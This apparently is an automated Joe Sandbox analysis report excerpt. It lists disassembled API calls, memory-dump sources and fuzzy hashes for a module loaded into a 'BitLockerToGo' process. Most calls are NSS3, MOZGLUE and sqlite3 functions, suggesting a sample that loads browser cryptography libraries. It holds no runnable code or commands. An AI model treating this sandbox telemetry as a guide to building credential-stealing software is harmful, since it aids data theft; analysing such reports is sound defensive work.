                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: TlsGetValue.KERNEL32(00000000,?,6C660948,00000000), ref: 6C658B6B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: EnterCriticalSection.KERNEL32(?,?,?,6C660948,00000000), ref: 6C658B80
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C660948,00000000), ref: 6C658B8F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: PR_Unlock.NSS3(?,?,?,?,6C660948,00000000), ref: 6C658BA1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C660948,00000000), ref: 6C658BAC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C658B50: free.MOZGLUE(?,?,?,?,?,6C660948,00000000), ref: 6C658BB8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225375108-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,?,?,?,6C6306A2,00000000,?), ref: 6C6309F8
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(0000001F), ref: 6C630A18
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C630A33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C630A6C
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C630A87
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Freecalloc$mallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 207547555-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C660710), ref: 6C658FF1
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2158,6C659150,00000000,?,?,?,6C659138,?,6C660710), ref: 6C659029
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000,?,?,6C660710), ref: 6C65904D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C660710), ref: 6C659066
                                                                                                                                                                                                                                                                                                                                                          • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C660710), ref: 6C659078
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1176783091-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4088f2ba8eb00cc3f0efe53c65c8a99c995484a0be8672b71d42ca527e1f3180
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ff509341a6d02776c9696b3ce1ca8761ced15c53a6cba59cc7dfca493ff2134
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4088f2ba8eb00cc3f0efe53c65c8a99c995484a0be8672b71d42ca527e1f3180
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F91108B170011157E7201AEDAC04A6A73ACEB827ACFA00939FD49C6B50F757CD66C7A9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681E10: TlsGetValue.KERNEL32 ref: 6C681E36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681E10: EnterCriticalSection.KERNEL32(?,?,?,6C65B1EE,2404110F,?,?), ref: 6C681E4B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681E10: PR_Unlock.NSS3 ref: 6C681E76
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,6C66D079,00000000,00000001), ref: 6C66CDA5
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C66D079,00000000,00000001), ref: 6C66CDB6
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C66D079,00000000,00000001), ref: 6C66CDCF
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C66D079,00000000,00000001), ref: 6C66CDE2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C66CDE9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fc6f14d06cc2f5f4a37fc34b1461b4d452602338dff4bca29d59470d737fb6e5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ea318f38e57c3e1b932ee4360c00be380034eb0347e5623d654ff75651c82148
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6f14d06cc2f5f4a37fc34b1461b4d452602338dff4bca29d59470d737fb6e5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E611A0B2B01515BBDF00AF66EC45996B77CFB053697100131E91A87E01E732E425C7EA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6D2CEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2D02
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2D1F
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2D42
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2D5B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d01c1ec28248adeaa6494a47fc5be1d41c9e9eb4eee876185143034a804223a8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9501C4F1A002046BE6309E26FC48BC7B7E1EF55318F014525E95A86B20E632FC158796
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6D2D9C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2DB2
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2DCF
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2DF2
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2E0B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aac78231cd5b6a8a3990c0c8dcb0c98e659b5cbc353b64605727cc50ba7429bd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C01C4F1A006006FEB309E25FC09BC7B7E1EF55318F010435E95A86B11D632F825879A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C66AE42), ref: 6C6530AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6530C7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6530E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C653116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C65312B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PK11_DestroyObject.NSS3(?,?), ref: 6C653154
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65317E
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C6499FF,?,?,?,?,?,?,?,?,?,6C642D6B,?), ref: 6C66AE67
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C6499FF,?,?,?,?,?,?,?,?,?,6C642D6B,?), ref: 6C66AE7E
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C642D6B,?,?,00000000), ref: 6C66AE89
                                                                                                                                                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B,?,?,00000000), ref: 6C66AE96
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C642D6B,?,?), ref: 6C66AEA3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 754562246-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cc319081077ec5dbaa2a1c29b31ea504713abd59fe4e8956a1925e6b0b5297a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e5464c5f7f53afbd1cde1f8d9c140d00d0aedad35c1aaf6da25566d73a6e3fef
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc319081077ec5dbaa2a1c29b31ea504713abd59fe4e8956a1925e6b0b5297a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201D1A6B0013057E701916EAC81AEF31988B87A5CB080131F906C7F03F715D91A53AF
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,6C750C83), ref: 6C75094F
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C750C83), ref: 6C750974
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750983
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?,?,6C750C83), ref: 6C75099F
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?,?,6C750C83), ref: 6C7509B2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1872382454-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a3be35fcce7f3a4f1c36186b534eab22eeeaabb13ddb6666ae7d06af9fab899
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e955f1bb6ed851b1d6027d7e66f3596d202f5b1bbf9e32013f91e201a56143f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a3be35fcce7f3a4f1c36186b534eab22eeeaabb13ddb6666ae7d06af9fab899
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 770157B8701250CFEF04AFA8E989B593BB9AB4331DF4C0275E845C3666DF35E460CA11
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C757C73
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757C83
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C757C8D
                                                                                                                                                                                                                                                                                                                                                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C757C9F
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757CAD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 105370314-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C75A6D8), ref: 6C75AE0D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75AE14
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C75A6D8), ref: 6C75AE36
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75AE3D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6C75A6D8), ref: 6C75AE47
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C77AAF9,?), ref: 6C5DBE37
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_mprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: ul$Pul$winFileSize
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4246442610-3148445840
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C5D8990
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: @z^l
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-2198484750
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5E7D35
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C5D6D36
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C5D6D2F
                                                                                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C5D6D2A
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5D6D20
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+kl,6C6B32C2,<+kl,00000000,00000000,?), ref: 6C6B2FDA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C6B300B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C6B302A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C68C45D
